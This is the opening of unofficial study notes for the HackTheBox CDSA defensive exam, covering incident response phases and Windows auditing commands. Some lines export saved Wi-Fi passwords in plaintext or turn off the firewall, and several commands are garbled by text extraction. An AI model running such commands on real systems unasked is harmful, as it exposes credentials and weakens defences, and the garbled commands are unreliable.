HacKTheBox Certified
Defensive Security
      Analyst
     Unofficial Study Notes
Companion Guide For Preparation
          HTB CDSA
       The Mastermind Notes
                           HTB CDSA
HTB CDSA
About The Authors
The MasterMinds Group is a group of talented authors and
writers who are experienced and well-versed across
different fields. The group is led by, Motasem Hamdan,
who is a Cybersecurity content creator and YouTuber.
The MasterMinds Group offers students and professionals
study notes, book summaries, online courses and
references across different work areas such as:
     Cybersecurity & Hacking
     Information Technology & System Administration
     Digital Marketing
     Business & Money
     Fitness & Health
     Self Improvement
     Data Analytics
     Blogging & Making Money Online
     Psychology
     Engineering
The group offers consultation services in the below areas:
     Cybersecurity Consultation: this includes specialzied-
     article writing services and malware removal.
     Digital Marketing & System Administration: this
     includes SEO, Google & Meta ads advertising.
Contact: consultation@motasem-notes.net
Instagram: mastermindsstudynotes
                            1 / 547
                            HTB CDSA
Web: Masterminds Notes
Store: Browse
Table of Contents
     About The Exam
     Exam Objectives
     HTB Machines and Materials For Preparation
          1. Blue Team Labs
          2. HTB Academy Modules
          3. HackTheBox Blue Team Machines
          4. Pro Labs for Advanced Blue Team Skills
     Necessary Tools To Understand
     Additional Tips To Pass
     Module 1: Incident Response
     Introduction
     Preparation and Auditing
          Windows AD and System Auditing
                Logged-in Users
                Auditing Workstations
                User Auditing
                Auditing Logins and accounts
                Auditing System Info
                Network Auditing
                     Network Auditing with netsh utility
                Services and Processes
                Auditing Group Policy
                Auditing startup items
                Auditing Network Shares
                Netview Tool
          Auditing AD with PowerView.ps1
                                2 / 547
                        HTB CDSA
     Linux
          Auditing System Information
          Auditing Users
          Auditing Startups
          Auditing Network Information
          Auditing Logs
          Auditing Applications
     Kernel Backdoors
          Check Kernel Logs for Suspicious Modules
          Investigate the Kernel Module Itself
          Extract and Analyze with strings
          Summary
          Tools/Functions Often Abused
     AD Enumeration with DSquery
Identification and Detection
     Malware Analysis
          Creating The Environment
          Static Analysis
               Definition
               Tools
               Hex and Ascii View of the suspected
               file
               Analyzing strings
               Extracting File Hash
               Finding The Imphash
               Analyzing The Signature
               Analyzing PE Headers
          Dynamic Analysis
               Definition
               Dynamic analysis tools
                         3 / 547
                 HTB CDSA
         Sandboxes
         Analysis tools
         Dynamic Analysis with Process Monitor
         Dynamic Analysis with API Logger
         Dynamic Analysis with API Monitor
         Dynamic Analysis with Process
         Explorer
         Dynamic Analysis with Regshot
Malware Analysis Evasion Techniques
    Packing and obfuscation
    Long sleep calls
    User activity detection
    Footprinting user activity
    Detecting VMs
Malware Detection and Triage
    Methodology
Automated Malware Scanning
    Linux
    Windows
         With Anti Viruses
         Sys Internals Tools
Analyzing startup processes and autoruns
    Windows
    Linux
Analyzing processes
    Windows
    Linux
Analyzing Logs
    Windows
         With wevtutil.exe
                  4 / 547
                  HTB CDSA
         With PowerShell
    Linux
Hunting Based on File Search and Processing
    Windows
Linux
Analyzing WMI Instances
    Manually
    Retriving WMI event filters and consumers
    Retriving bindings for a specific event filter
    With Autorun
Hunting Malwares with Yara
    Installing Yara
         Through package manager
         Manually
    Creating rules
    Automated yara rules creation
    Yara scanners
    Useful modules for malware analysis
    Resources for Yara rules
Reverse Engineering
    Definition
    PC Reverse Engineering
         Basics
         Definitions and Terms
         Compiling Assembly Code
         General Remarks
         Reverse Engineering Tools
    PDF analysis & reverse engineering
    MS Office analysis & reverse engineering
    Android Reverse Engineering
                   5 / 547
                        HTB CDSA
                Tools
                Methodology
Eradication and Malware Removal
- Windows
- Linux
Recovery and Remediation
- Patching
- Firewall Operations
- Windows
- AppLocker
- With GPO
- With PowerShell
- Security controls and hardening using the Registry
editor
- Recovery
     Backup and Restore
          Windows
                Group Policy Update and Recovery
                Volume Shadow Service
          Linux
Module 2: Threat Intelligence and Hunting
Cyber Threat Intelligence
     Definitions
          Information Sharing and Analysis Centers
          (ISACs)
          TTP
     How to gather threat intelligence
     Threat Intelligence Types
     Steps to create threat intelligence campaign
     Lifecycle Phases of Cyber threat intelligence
          Direction
                         6 / 547
                     HTB CDSA
     Collection
     Processing
     Analysis
     Dissemination
     Feedback
Threat Intelligence Frameworks
     MITRE ATT&CK
     TIBER(Threat Intelligence-based Ethical Red
     Teaming)-EU
     OST Map
     TAXII
     STIX
     The Diamond Model
     The Unified Kill Chain
     The Cyber Kill Chain
Threat Intelligence Platforms
     Malware Information Sharing Platform
             Definition
             MISP Use Cases
             Installation and Setting Up
             The Instance Dashboard Breakdown
             Event Actions
             Input filters
             Global actions
             Creating an event
             Adding attributes to the event
             Adding attachments to the event
             Tags
             Publishing the event
     OpenCTI
                      7 / 547
                   HTB CDSA
         Definition
         Connectors
         Activities Section
         Analysis Tab
         Events
         Observations
    Knowledge Section
         Threats
         Arsenal
    The Hive
         Key terms
         Cases and Tasks
                Creating cases and tasks
         TTPs
         Observables
         Cortex
         Dashboards
         MISP ( Malware information sharing
         platform)
         Live stream
         User Profiles
         Links
Threat modelling
    Definition of Threat Modeling
    Threat Modeling vs Threat Hunting
    Creating a Threat Modeling Plan
    Threat Modeling Team
    Microsoft Threat Modeling Tool
    Threat Modeling Frameworks
         PASTA
                    8 / 547
                       HTB CDSA
              STRIDE
              DREAD Framework
    Detection Engineering
         Definition
         Creating Detection Rules
    Threat Emuleation
         Definitions
              MITRE ATT&CK
              Atomic Testing
              TIBER-EU Framework
              CTID Adversary Emulation Library
              CALDERA
         Threat Emulation Steps
Module 3: Log Analysis Essentials
    Understanding Logs
    Collecting Logs
    Log Management
    Log Analysis
Windows Logs Analysis
    Enable success and failure logging on all
    categories
    Auditing Windows Event Logs from command line
    Investigating Event logs with PowerShell
         Auditing all the logs in the local PC
         Auditing log providers
         Listing log providers with 'powershell' as a
         keyword
         Listing events related to windows
         powershell
                        9 / 547
             HTB CDSA
Listing available logs containing given
keyword
Listing events on a specific log path
Finding process related information using a
given keyword about the process
listing application logs from WLMS provider
and generated at the given time
Displaying events logged for processes
initiated network connections.
listing security logs with sam as target
usrname and event id equals to 4724
listing security logs with event id equals to
400
listing logs from log file with event id = 104
and format as list displaying all events
properties
listing logs from log file with event id =
4104 with string 'ScriptBlockText' and
format as list displaying all events
properties
listing logs from log file with event id =13
with string 'enc' in the message field and
format as list displaying all events
properties
filtering events using time range
listing security logs with sam as target
usrname and event id equals to 4799
Listing accounts validation logs in the last
10 days
Auditing accounts logged on/off in the last
two days
              10 / 547
                      HTB CDSA
         Auditing access to file shares, file system,
         SAM and registry in the last two days
         Auditing the use of privilege
         Auditing system changes and integrity
         events
         Detecting the use of psexec
    Investigating Logs with Sysmon and Powershell
         Hunting for Metasploit events
         Filtering for Network connections
         Filtering for Network connections in format
         list with maximum quantity of one
         Filtering for process access events
         specifically lsass.exe
         Filtering for Alternate Data Streams events
         Filtering for process hollowing events
    Investigating IIS logs
    Investigating Windows Event Logs with Timeline
    explorer
    Investigating Windows Event Logs with Sysmon
    View
    Investigating Windows Event Logs with Python-
    evtx tools
    Windows Event IDs
         Security
    Sysmon Events
Linux Log Analysis
    Manual Analysis
         Auditing authentication logs
         Listing stats about services used in
         authentication
         Auditing User login logs in Ubuntu
                       11 / 547
                          HTB CDSA
           Auditing samba activity
           Auditing cron job logs
           Auditing sudo logs
           Filtering 404 logs in Apache
           Auditing files requested in Apache
           View root user command history
           View last logins
           Viewing SSH authentication logs
           Viewing stats about failed login attempts
           sorted by user
           Viewing successful authentication logs
           View currently logged in users
    Manual Log Analysis with ULogViewer
    Network Logs
Logs Centralization
    SIEM
    Syslog Protocol
Module 4: Network Traffic Analysis
    Basics
    Wireshark
           Definition
           Dashboard
           Loading PCAP Files For Analysis
           Sniffing Packets
           Capture File Details
           Packet Dissection
           Finding and Navigating Through Packets
           Filter Types
           Example Display Filters
           Data Extraction and Statistics
                           12 / 547
                    HTB CDSA
       Creating Filter Bookmarks
       Comparison Operators
       Practical Scenarios
TCPDUMP
Tshark
       Definition
       Sniffing Traffic / Live Capture
       PCAP Analysis
       Analytics
       Fields Extraction
       Conditional Data Extraction
Zeek
       Definition
       Zeek Architecture
       Zeek Frameworks
       Running Zeek as a service
       Running Zeek as a Packet Investigator
       Logging
       Zeek Signatures
       Zeek Scripts
       Signatures with Scripts
       Zeek Frameworks
       Zeek Package Manager
Network Miner
       Definition
       Use Cases of Network Miner
       Operating Modes
       Tool Components
Brim
       Definition
                      13 / 547
                      HTB CDSA
         Input Formats
         Queries in Detail
         Custom Queries
         Investigative Queries
Module 5: Endpoint Security and Monitoring
    OSquery
         Definition
         Investigation methodology
         Entering the interactive mode
         Display the help menu
         Displaying version and other values for the
         current settings
         Change output mode
         Querying the version of os query installed
         on a windows endpoint
         Checking the available tables
         Displaying tables containing specific aspect
         of windows
         Displaying and querying the columns of a
         table
         Display information about running processes
         Display number of running processes
         Join the results of two tables. It requires
         on common column
         Investigate services such as windows
         defender
         Investigate windows defender logs
         Investigate sysmon logs
         Investigate Browsers
    Sysmon
                       14 / 547
             HTB CDSA
Definition
What Can You Do with Sysmon?
How to Install and Configure Sysmon
     Step 1: Download Sysmon
     Step 2: Install Sysmon
     Step 3: Create or Download a
     Configuration File
     Step 4: Start Sysmon with the
     Configuration File
     Step 5: Verify Sysmon Installation
Configuring and Tuning Sysmon
     Example Configuration Snippet
Updating Sysmon
Uninstalling Sysmon
Creating Alerts for High-Value Events
     Process Creation Alerts
     Network Connection Alerts
     Registry Modification Alerts
Parsing Sysmon Logs with Powershell
     1. Basic Retrieval of Sysmon Logs
     2. Filter Sysmon Logs by Event ID
     3. Retrieve Sysmon Logs within a
     Specific Date Range
     4. Filter Sysmon Logs by Keywords
     5. Display Sysmon Logs in a Table
     6. Export Sysmon Logs to a CSV File
     7. Example: Advanced Filtering with
     Multiple Conditions
Automating with a Script
Threat Hunting with Sysmon
              15 / 547
                 HTB CDSA
         Hunting for PowerShell Abuse
         Detecting Suspicious Network
         Connections
         Suspicious DLL Injection
         Detecting Persistence Techniques
         (Registry Monitoring)
         Tracking Credential Dumping
    Proactive Threat Hunting Techniques
         Baseline Normal Activity
         Use YARA Rules and Sysmon
         Configurations
         Look for Command-Line Obfuscation
         Search for Suspicious Parent-Child
         Process Relationships
         Automating Threat Hunting with Scripts
    Integrating Sysmon with SIEM for
    Centralized Monitoring
         Benefits of SIEM Integration:
         Sample SIEM Queries
    Common Sysmon Event IDs for Reference
         Common Sysmon Event IDs
Yara Rules
    Definition
    Creating Yara Rules
    Components of a Yara Rule
    Yara Scanners
         LOKI
         THOR
         yaraGEN
         VALHALLA
                   16 / 547
                       HTB CDSA
         Yara Rules with YaraGen for Malware
         Detection
              Installing YaraGen
              Running YaraGen
              Example Output from YaraGen
         Testing and Fine-Tuning YARA Rules
              Testing YARA Rules
              Fine-Tuning YARA Rules
         Examples of Advanced YARA Rules for
         Malware Detection
              Detecting Packed Files
         Resources
Module 6: SIEM and Detection Engineering
    Splunk
         Introduction to IPS & IDS
         Definitions
              Host
              Source
              Tags
              Indexes
              Splunk Forwarder
              Splunk Indexer
              Splunk Search Head
         Search Processing Language
         Basic Search Commands
         Comparison Operators
         Boolean Operators
         Statistical Functions
         Chart Commands
         Log Monitoring
                        17 / 547
              HTB CDSA
     Continuous Log Monitoring and From A
     Log File
     Continuous Log Monitoring Through
     Network Ports
     Continuous Log Monitoring Through
     Splunk Universal Forwarder
Splunk Installation
     On Linux
     On Windows
Collecting Logs
     From Linux Machines
     From Windows Machines
Operational Notes
Using Splunk For Incident Response
     Parsing Suricate IDS Logs
     Parsing http traffic
     Parsing general network traffic
     Parsing Sysmon events
     Parsing Fortinet Firewall logs
     USB attacks
     File sharing
     Parsing DNS
     Email Activity
     FTP events
     AWS Events
     Symantec endpoint protection events
     O365 Events
     WIN event logs
     Linux events
     Osuery
               18 / 547
                     HTB CDSA
           SSH Events
           Detecting PrintNightmare vulnerability
                   Identifies Print Spooler adding a
                   new Printer Driver
                   Detects spoolsv.exe with a child
                   process of rundll32.exe
                   Suspicious rundll32.exe instances
                   without any command-line
                   arguments
                   Detects when a new printer plug-
                   in has failed to load
      Creating Alerts
      Reporting With Splunk
      Creating Dashboards
ELK
      Definition
      Purpose of ELK
      Methodology
           I am a data analyst, how should I
           start?
           I am a security engineer, how should I
           start?
      Components of elastic stack
      Elastic Search
           Purposes of Using Elastic Search
           Elastic Search Index
           Elastic Search Node
           Elastic Search Clusters
           Elastic Search Installation and
           configuration
           Elastic Search Configuration
                      19 / 547
             HTB CDSA
    Verifying Installation
    Executing Search Queries in Elastic
    Search
Ingesting Logs
    With Elastic Agent
    With Log Stash
         Installing and Configuring
         Logstash
    With Beats
         Types of Beats
         Installation and Configuration
Beats Vs Logstash: Which one to use for
log collection and ingestion?
Example Ingesting Fortinet Firewall Logs
Kibana
    Installing and Configuring Kibana
    Kibana Components
         Discover Tab
         Fields
         Tables
    KQL (Kibana Query Language)
         Reserved Characters in KQL
         WildCards in KQL
         Searching The Logs with KQL
    Data Visualization
    Dashboards
    Creating Canvas with Kibana
    Creating Maps with Kibana
    Creating Alerts in Kibana
Cyber Cases Studies
              20 / 547
                           HTB CDSA
About The Exam
Passing the HackTheBox Certified Defensive Security
Analyst (CDSA) certification requires a solid grasp of
cybersecurity fundamentals, practical skills in incident
response, threat detection, and analysis, as well as
hands-on experience in a lab environment.
     The HTB CDSA exam is a practical, hands-on test
     focusing on defensive security skills.
     Typically involves real-world scenarios like analyzing
     malicious activity, conducting incident response, and
     working through various defensive techniques in a lab
     setting.
     The exam duration ( 7 days as of this writing ) and
     exact passing criteria can vary, so it’s essential to
     check [HackTheBox’s official documentation]
     [https://academy.hackthebox.com/preview/certifica
     tions/htb-certified-defensive-security-analyst] for
     the latest guidelines.
Exam Objectives
     Threat Intelligence & Hunting: Learn to collect and
     analyze threat intelligence, identify Indicators of
     Compromise (IoCs), and utilize threat-hunting
     techniques to discover malicious activity in systems.
     Incident Response & Management: Understand
     incident response phases, including preparation,
     identification, containment, eradication, recovery,
     and lessons learned.
     Log Analysis: Get comfortable with analyzing logs
     from sources such as SIEM (Security Information and
                            21 / 547
                        HTB CDSA
  Event Management), firewalls, and network devices.
  Practice parsing, filtering, and analyzing logs for
  evidence of threats.
  Network Traffic Analysis: Familiarize yourself with
  network traffic analysis tools like Wireshark, Zeek,
  and tcpdump. Learn to recognize common attack
  patterns in network traffic (e.g., port scanning,
  exfiltration).
  Endpoint Security: Gain experience with tools and
  techniques for analyzing endpoint activity, such as
  file system changes, process monitoring, and
  registry analysis.
  Malware Analysis: Know the basics of malware
  analysis, including how to identify malicious files,
  review their behavior in a controlled environment,
  and analyze file metadata for clues.
HTB Machines and Materials For
Preparation
1. Blue Team Labs
  Windows Event Logs: Practice analyzing Windows
  Event logs to detect malicious behaviors, including
  suspicious logons, process creation, and registry
  modifications.
  Splunk Fundamentals: A lab focused on using Splunk
  for log aggregation, analysis, and correlation—
  essential for incident response and SOC operations.
  Wireshark Essentials: Hands-on practice in network
  traffic analysis to identify anomalies, detect
                         22 / 547
                          HTB CDSA
     threats, and understand network packet structures.
     Zeek (Bro) Network Security Monitor: This lab
     focuses on using Zeek (formerly known as Bro) for
     network monitoring and incident detection. Zeek logs
     are often used for network threat hunting and
     analysis.
     Sysmon Essentials: Provides experience in monitoring
     endpoint activities using Sysmon, which logs detailed
     information about process creation, network
     connections, and file modifications.
2. HTB Academy Modules
HTB Academy has modules specifically designed for
defensive security skills. Some recommended ones
include:
     Log Analysis Basics: Focuses on understanding logs
     from various sources (e.g., Windows, Linux) and
     analyzing them for security incidents.
     Incident Response Fundamentals: Covers the incident
     response lifecycle, from preparation to recovery and
     lessons learned.
     Endpoint Security and Monitoring: This module
     includes labs on monitoring endpoints and using tools
     like OSQuery for proactive threat detection.
     SIEM Basics with Elastic Stack: Provides hands-on
     practice with the ELK Stack, which is valuable for
     log management, threat detection, and incident
     response.
3. HackTheBox Blue Team Machines
                           23 / 547
                           HTB CDSA
HackTheBox machines offer environments that simulate
real-world security challenges. Here are some machines
aligned with blue team skills:
     Dancing: Focuses on analyzing compromised Linux
     logs to find unauthorized access and isolate attack
     patterns. It emphasizes log analysis and root cause
     determination.
     RouterSpace: Involves detecting suspicious network
     activity and discovering the extent of a security
     breach. This machine is excellent for network traffic
     analysis and log correlation.
     Cuckoo: A machine that requires basic malware
     analysis skills. It provides an opportunity to
     investigate a system infected with malware, gather
     IoCs, and conduct static and dynamic malware
     analysis.
     Entropy: Focuses on analyzing a compromised web
     server, requiring skills in log analysis and
     vulnerability detection.
     Knife: This machine tests your ability to spot
     misconfigurations and insecure application setups
     commonly exploited in real-world attacks, which you
     can then correlate with system logs for defensive
     insights.
4. Pro Labs for Advanced Blue Team
Skills
     Rastahack: Offers a larger environment with multiple
     systems that simulate a small organization’s
     network, allowing for complex incident detection and
     response exercises.
                            24 / 547
                            HTB CDSA
     Fortress: A Pro Lab designed to simulate a full-scale
     enterprise network with multiple machines. The lab
     includes various network configurations and an AD
     environment, which can be used to practice real-
     world defensive skills, including network defense,
     host monitoring, and log analysis.
Necessary Tools To Understand
Familiarize yourself with popular blue team tools often
used in the field, including:
     SIEM Tools: Splunk, ELK Stack (Elasticsearch,
     Logstash, Kibana)
     Network Analysis: Wireshark, tcpdump, Zeek
     Endpoint Detection & Response (EDR): Sysmon,
     OSQuery
     Threat Intelligence Platforms: MISP, Open Threat
     Intelligence Frameworks
     Malware Analysis: Ghidra, IDA Pro (basic usage), PE
     Studio, YARA rules
Additional Tips To Pass
     Set aside consistent time for practice labs, tool
     training, and log analysis.
     Break down topics and focus on mastering one area
     at a time, such as starting with log analysis before
     moving to malware analysis.
     Dedicate specific hours for incident response
     simulations and exercises, as this is a critical skill
     for CDSA.
                             25 / 547
                           HTB CDSA
     Try to simulate the exam environment by setting up
     time-limited practice sessions where you go through
     incident response and forensic analysis exercises
     without external help.
     Familiarize yourself with a note-taking system to log
     your process, findings, and commands used, which
     will help during the exam and in report writing.
     Prepare a reporting template for capturing essential
     details on findings, IoCs, and recommended
     mitigation steps.
     HackTheBox exams often require detailed
     documentation, so practice writing clear, concise,
     and accurate reports based on your investigation.
     After each practice session, review areas where you
     struggled and revisit relevant resources.
     Consider joining forums or HTB community discussions
     to clarify concepts and get tips from those who have
     completed the certification.
Module 1: Incident Response
Introduction
Incident Response Policy
An incident response policy defines a security
incident and incident response procedures. Incident
response procedures start with preparation to prepare for
and prevent incidents. Preparation
helps prevent incidents such as malware infections.
Personnel review the policy periodically and in response to
lessons learned after incidents.
incident response plan
                            26 / 547
                             HTB CDSA
An incident response plan provides more detail than the
incident response policy. It includes details about the
different types of incidents, incident response team and
their roles and responsibilities. It also includes a
communication plan which provides direction on how to
communicate issues related to an incident.
Incident Response Process
The incident response process contains the below steps in
order:
Preparation
This phase occurs before an incident and provides
guidance to personnel on how to respond to an incident. It
includes establishing and maintaining an incident response
plan and incident
response procedures. It also includes establishing
procedures to prevent incidents. For example, preparation
includes implementing security controls to prevent
malware infections.
During the preparation phase, it is also crucial to identify
high-value assets within the organization, together with
their technical composition. This will comprise the
infrastructure, intellectual property, client and employee
data, and brand reputation. Protecting these assets
ensures that the confidentiality, integrity, and availability
of the organization's services, data, and processes are
intact, which also helps maintain credibility. Additionally,
the asset classification will be helpful for the prioritization
of protective and detective measures for the assets.
The end points and servers need to be fully configured to
log events and/or forward them to a central server for
later examination as well.
                              27 / 547
                            HTB CDSA
Identification & scoping
In this stage, which also called detection, the incident is
reported either through notifications from other personnel
or through the continuous log monitoring done by the SOC
team.
In this stage we verify that the observed event is an
actual incident. For example, intrusion detection systems
(IDSs) might falsely report an intrusion, but when we
investigate it and verify if it is a false positive or an
incident. If the
incident is verified, we might try to isolate the system
based on established procedures.
After identification, the next critical step in the Incident
Response Process is Scoping, which involves determining
the extent of a security incident, including identifying the
affected systems, the type of data at risk, and the
potential impact on the organization.
Evidence of the incident is collected, including log files,
network traffic data, and other relevant information. The
collected evidence provides valuable insights into the
incident and helps identify potential threats. The collected
evidence is then analysed to identify artefacts related to
the incident. These artefacts can provide clues about the
threat's nature and the damage's extent.
Containment
Containment might include quarantining a device or
removing it from the network. This can be as simple as
unplugging the system’s network interface card to ensure
it can’t communicate on the network. Similarly, you can
isolate a network from the Internet by modifying access
control lists on a router or a network firewall.
Another way to contain or isolate a system is by following
                             28 / 547
                           HTB CDSA
the controlled isolation strategy. This strategy involves
the incidence response team closely monitoring the
adversary’s actions. Rather than strictly isolating the
infected system(s), the team would keep the system
accessible to not tip off the adversary. An incident
response team can gather vital information and intelligence
about the adversary by allowing the adversary to
continue.
However, the adversary isn’t given free-roam. For
example, the incident response team can prevent access
if the adversary is about to perform something destructive
such as wiping or exfilling data. A good “cover story” can
be made to convince the adversary why they’ve suddenly
lost access. For example, an announcement could be
made that routine maintenance is occurring.
Eradication
After containing the incident, it’s often necessary to
remove components from the attack. For example, if
attackers installed malware on systems, it’s important to
remove all remnants of the malware on all hosts. Some
malwares can be automatically quarantined, cleaned up,
and removed by tools such as Anti-Viruses (AVs) and
EDRs. However, keep in mind that this is most effective
on less sophisticated threats that employ well-known
malicious tooling. Unique or targeted threats employed by
more sophisticated bad guys are usually purpose-built to
bypass these automated detection and prevention systems
and so relying solely on this method is not advised.
Another eradication approach which is the most
straightforward way to eradicate attacker traces from a
specific endpoint is to completely rebuild it. Wiping the
system clean of everything ensures the system has a
                            29 / 547
                            HTB CDSA
clean slate, however, the downside is that this approach
is absolute. All of the ‘normal’ contents will be removed
along with all of the bad ones and so it is necessary to
reinstall all applications, revert all configurations, and
restore all wiped data so it functions as good as it was
before the compromise, if not better.
Take note that this approach entails downtime for the
system. When deciding which eradication technique fits
the compromise scenario best, the decision is also
influenced by the allowable downtime the resources in
question have. Some organizations have ‘legacy’
resources where a downtime of a few minutes could cost
the organization millions of dollars and so a complete
rebuild may completely be out of the question.
Recovery
We return all affected systems to normal operation and
verify they are operating normally. This might include
rebuilding systems from images, restoring data from
backups, and installing updates.
Lessons Learned
This phase of the IR process is essentially a sit-down
with the data that you’ve gathered throughout
the IR process and the learnings gained from them.
The incident may provide some valuable lessons, and we
might modify procedures or add additional controls to
prevent a reoccurrence of the incident.
During this phase, a technical summary and an executive
summary are written.
A technical summary is a summary of the relevant findings
about the incident from detection to recovery. The goal of
this document is to provide a concise description of the
                             30 / 547
                           HTB CDSA
technical aspects of the incident, but it can also function
as a quick reference guide.
An executive summary may contain the below:
 - A summary of the impact of the compromise
 - Did we lose money?
 - Did they steal it?
 - Did we lose it due to downtime of sensitive
 servers / endpoints?
 - Did we lose data?
 - PIIs?
 - Proprietary pieces of information that are
 top secret?
 - Was it a high-profile case, and if so, what
 kind of reputational damage are we looking at
 here?
 - A summary of the events and / or
 circumstances that led to / caused the
 compromise
 - How did this happen?
 - A summary of the actions already done, and
                              31 / 547
                           HTB CDSA
 actions planned in the near, mid, and long
 term to remediate and recover from it, and to
 prevent it from happening again in the future
Preparation and Auditing
The below commands can be executed on a domain
controller or active directory machine
Windows AD and System Auditing
Logged-in Users
     Below command is executed to list logged on users
     on a domain-joined machine or the domain controller
 C:\> psloggedon \\computername
     Below is to discover all logged-in users on the same
     network
 C:\> for /L %i in (1,1,254) do psloggedon
 \\192.168.l.%i >> C:\logged-users.txt
     Alternatively you can use the GUI interface of the tool
     from below link
 https://learn.microsoft.com/en-
 us/sysinternals/downloads/psloggedon
                            32 / 547
                            HTB CDSA
Auditing Workstations
     Listing workstations
 C:\> netdom query WORKSTATION
     Listing servers in the domain
 C:\> netdom query SERVER
     Listing primary domain controllers
 C:\> netdom query PDC
     Listing all computers joined to the main domain
     controller
 C:\> dsquery COMPUTER "OU=servers,DC=<DOMAIN
 NAME>,DC=<DOMAIN EXTENSION>" -o rdn -limit 0 >
 C:\PCs.txt
User Auditing
Listing inactive users for a specified number of weeks
 C:\> dsquery user domainroot -inactive
 [number-of-weeks]
Current user
 C:\> whoami
                             33 / 547
                          HTB CDSA
Retrieve all users
 C:\> net users
Retrieve administrators
 C:\> net localgroup administrators
Retrieve administrators Groups
 C:\> net group administrators
Retrieve user info with wmic
 C:\> wmic rdtoggle list
 C:\> wmic useraccount list
 C:\> wmic group list
 C:\> wmic netlogin get name,
 lastlogon,badpasswordcount
 C:\> wmic netclient list brief
Using history file
 C:\> doskey /history> history.txt
Get information about other users according to department
 PS> Get-NetUser -filter "department=HR*"
List users
                           34 / 547
                           HTB CDSA
 net users
View specific details about a user
 net users admin
View groups
 net localgroup
View privilege of current user:
 <C:\whoami /priv>
View users of administrator group
 C:\net localgroup Administrators
Auditing Logins and accounts
     Listing users created on the specified time in
     YYYYMMDDHHMMSS
 C:\> dsquery * -filter
 "((whenCreated>=YYYYMMDDHHMMSS.0Z)&
 (objectClass=user))"
     You can also listing all objects created on a specified
     time/date regardless of the object type
                            35 / 547
                             HTB CDSA
 C:\> dsquery * -filter
 "(whenCreated>=YYYYMMDDHHMMSS.0Z)"
      Listing the last logon of all users
      [1]
 C:\> dsquery * dc=<DOMAIN NAME>,dc=<DOMAIN
 EXTENSION> -filter "(&(objectCategory=Person)
 (objectClass=User)
 (whenCreated>=YYYYMMDDHHMMSS.0Z))"
[2]
 C:\> adfind -csv -b dc=<DOMAIN NAME>,dc=
 <DOMAIN
 EXTENSION> -f "(&(objectCategory=Person)
 (objectClass=User)
 (whenCreated>=YYYYMMDDHHMMSS.0Z))"
      Listing all AD accounts in the last 30 days using
      Powershell
      [1]
 PS C:\> import-module activedirectory
 PS C:\> Get-QADUser -CreatedAfter (GetDate).
 AddDays(-30)
[2]
                              36 / 547
                            HTB CDSA
 PS C:\> import-module activedirectory
 PS C:\> Get-ADUser -Filter * -Properties
 whenCreated | Where-Object {$_.whenCreated -ge
 ((GetDate).AddDays(-90)).Date}
Auditing System Info
Date and Time
 C:\> echo %DATE% %TIME%
Host-Name
 C:\> hostname
All systeminfo
 C:\> systeminfo
Export OS info into a file with Powershell
 Get-WmiObject -class win32 operatingsjstem |
 select -property | exportcsv
 c:\os.txt
OS Name
 C:\> systeminfo I findstr /B /C:"OS Name"
 /C:"OS Version"
                             37 / 547
                          HTB CDSA
System info with wmic
 C:\> wmic csproduct get name
 C:\> wmic bios get serialnumber
 C:\> wmic computersystem list brief
System info with sysinternals
 C:\> psinfo -accepteula -s -h -d
 Ref. https://technet.microsoft.com/enus/
 sysinternals/psinfo.aspx
Network Auditing
With netstat
Open Connections
 C:\> netstat ano
Listening Ports
 netstat -ani findstr LISTENING
Other netstat commands
 C:\> netstat -e
 C:\> netstat -naob
 C:\> netstat -nr
                           38 / 547
                      HTB CDSA
 C:\> netstat -vb
 C:\> nbtstat -s
View routing table
 C:\> route print
View ARP table
 C:\> arp -a
View DNS settings
 C:\> ipconfig /displaydns
Proxy Information
 C:\> netsh winhttp show proxy
All IP configs
 C:\> ipconfig /allcompartments /all
Network Interfaces
 C:\> netsh wlan show interfaces
 C:\> netsh wlan show all
With registry
                       39 / 547
                            HTB CDSA
 C:\> reg query
 "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
 n\Internet
 Settings\Connections\WinHttpSettings"
 C:\> type
 %SYSTEMROOT%\system32\drivers\etc\hosts
With wmic
 C:\> wmic nicconfig get
 descriptions,IPaddress,MACaddress
 C:\> wmic netuse get
 name,username,connectiontype, localname
Network Auditing with netsh utility
Saved wireless profiles
 netsh wlan show profiles
Export wifi plaintext pwd
 netsh wlan export profile folder=. key=clear
List interface IDs/MTUs
 netsh interface ip show interfaces
Set IP
                             40 / 547
                            HTB CDSA
 netsh interface ip set address local static
 IP netmask gateway ID
Set DNS server
 netsh interface ip set dns local static ip
Set interface to use DHCP
 netsh interface ip set address local dhcp
Disable Firewall
 netsh advfirewall set currentprofile state off
 netsh advfirewall set allprofiles state off
Services and Processes
Listing processes
 C:\> tasklist
 C:\> task list /SVC
 C: \> tasklist /SVC /fi "imagename eq
 svchost.exe"
Listing processes with DLLs
 C:\> tasklist /m
Listing Processes with remote IPs
                              41 / 547
                              HTB CDSA
 tasklist /S ip /v
Listing Processes with their executables
 C: \> tasklist /SVC /fi "imagename eq
 svchost.exe"
Force Process to terminate
 taskkill /PID pid /F
Scheduled tasks list
[1]
 C:\> schtasks
[2]
 Get-ScheduledTask
Managing network services
 C:\> net start
Managing services with   sc     and       wmic
 C:\>   sc query
 C:\>   wmic service list brief
 C:\>   wmic service list conf ig
 C:\>   wmic process list brief
                               42 / 547
                           HTB CDSA
 C:\> wmic process list status
 C:\> wmic process list memory
 C:\> wmic job list brief | findstr "Running"
Services running with PowerShell
[1]
 PS C:\> Get-Service I Where-Object { $_.Status
 -eq "running" }
[2]
 get-service
Auditing Group Policy
Any of the commands below will list the current GPO
settings and the second and third ones will send the
output to an external file
 C:\> gpresult /r
 C:\> gpresult /z > <OUTPUT FILE NAME>.txt
 C:\> gpresult /H report.html /F
With wmic
 C:\> wmic qfe
Auditing startup items
With wmic
                            43 / 547
                           HTB CDSA
 C:\> wmic startup list full
 C:\> wmic ntdomain list brief
By viewing the contents startup folder
 C:\> dir
 "%SystemDrive%\ProgramData\Microsoft\Windows\S
 tart Menu\P rog rams\Startup"
 C:\> dir "%SystemDrive%\Documents and
 Settings\All
 Users\Sta rt Menu\Prog rams\Sta rtup"
 C:\> dir %userprofile%\Start
 Menu\Programs\Startup
 C:\> %ProgramFiles%\Startup\
 C:\> dir C:\Windows\Start
 Menu\Programs\startup
 C:\> dir
 "C:\Users\%username%\AppData\Roaming\Microsoft
 \Windows\Start Menu\Programs\Startup"
 C:\> dir
 "C:\ProgramData\Microsoft\Windows\Start
 Menu\Programs\Startup"
                            44 / 547
                           HTB CDSA
 C:\> dir "%APPDATA%\Microsoft\Windows\Start
 Menu\Programs\Startup"
 C:\> dir
 "%ALLUSERSPROFILE%\Microsoft\Windows\Start
 Menu\Programs\Startup"
 C:\> dir "%ALLUSERSPROFILE%\Start
